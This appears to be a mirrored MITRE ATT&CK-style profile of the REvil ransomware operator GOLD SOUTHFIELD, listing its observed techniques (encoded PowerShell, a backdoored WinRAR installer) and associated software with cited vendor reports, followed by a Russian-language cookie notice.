GOLD SOUTHFIELD
Associated Group Descriptions |
|
| Name | Description |
|---|---|
| Pinchy Spider | (Citation: CrowdStrike Evolution of Pinchy Spider July 2021) |
Techniques Used |
||||
| Domain | ID | Name | Use | |
|---|---|---|---|---|
| Enterprise | T1059 | .001 | Command and Scripting Interpreter: PowerShell |
GOLD SOUTHFIELD has staged and executed PowerShell scripts on compromised hosts.(Citation: Tetra Defense Sodinokibi March 2020) |
| Enterprise | T1027 | .010 | Obfuscated Files or Information: Command Obfuscation |
GOLD SOUTHFIELD has executed base64 encoded PowerShell scripts on compromised hosts.(Citation: Tetra Defense Sodinokibi March 2020) |
| Enterprise | T1195 | .002 | Supply Chain Compromise: Compromise Software Supply Chain |
GOLD SOUTHFIELD has distributed ransomware by backdooring software installers via a strategic web compromise of the site hosting Italian WinRAR.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD) |
Software |
|||
| ID | Name | References | Techniques |
|---|---|---|---|
| S0591 | ConnectWise | (Citation: Anomali Static Kitten February 2021) (Citation: ScreenConnect) (Citation: Tetra Defense Sodinokibi March 2020) (Citation: Trend Micro Muddy Water March 2021) | Video Capture, PowerShell, Screen Capture |
| S0496 | REvil | (Citation: Cylance Sodinokibi July 2019) (Citation: G Data Sodinokibi June 2019) (Citation: Group IB Ransomware May 2020) (Citation: Intel 471 REvil March 2020) (Citation: Kaspersky Sodin July 2019) (Citation: McAfee REvil October 2019) (Citation: McAfee Sodinokibi October 2019) (Citation: Picus Sodinokibi January 2020) (Citation: Secureworks GandCrab and REvil September 2019) (Citation: Secureworks REvil September 2019) (Citation: Sodin) (Citation: Sodinokibi) (Citation: Talos Sodinokibi April 2019) (Citation: Tetra Defense Sodinokibi March 2020) | Safe Mode Boot, Data Encrypted for Impact, Windows Command Shell, Disable or Modify Tools, PowerShell, Asymmetric Cryptography, Process Injection, Match Legitimate Name or Location, Modify Registry, Data Destruction, Query Registry, Visual Basic, Exfiltration Over C2 Channel, Service Stop, System Information Discovery, Native API, Malicious File, Create Process with Token, Mutual Exclusion, File and Directory Discovery, Encrypted/Encoded File, Drive-by Compromise, System Service Discovery, Windows Management Instrumentation, Deobfuscate/Decode Files or Information, Spearphishing Attachment, Ingress Tool Transfer, System Language Discovery, Token Impersonation/Theft, Web Protocols, Domain Groups, File Deletion, Inhibit System Recovery, Fileless Storage |
References
- Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.
- Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved December 14, 2020.
- Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.
- Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.
- Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.
- Meyers, Adam. (2021, July 6). The Evolution of PINCHY SPIDER from GandCrab to REvil. Retrieved March 28, 2023.
Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.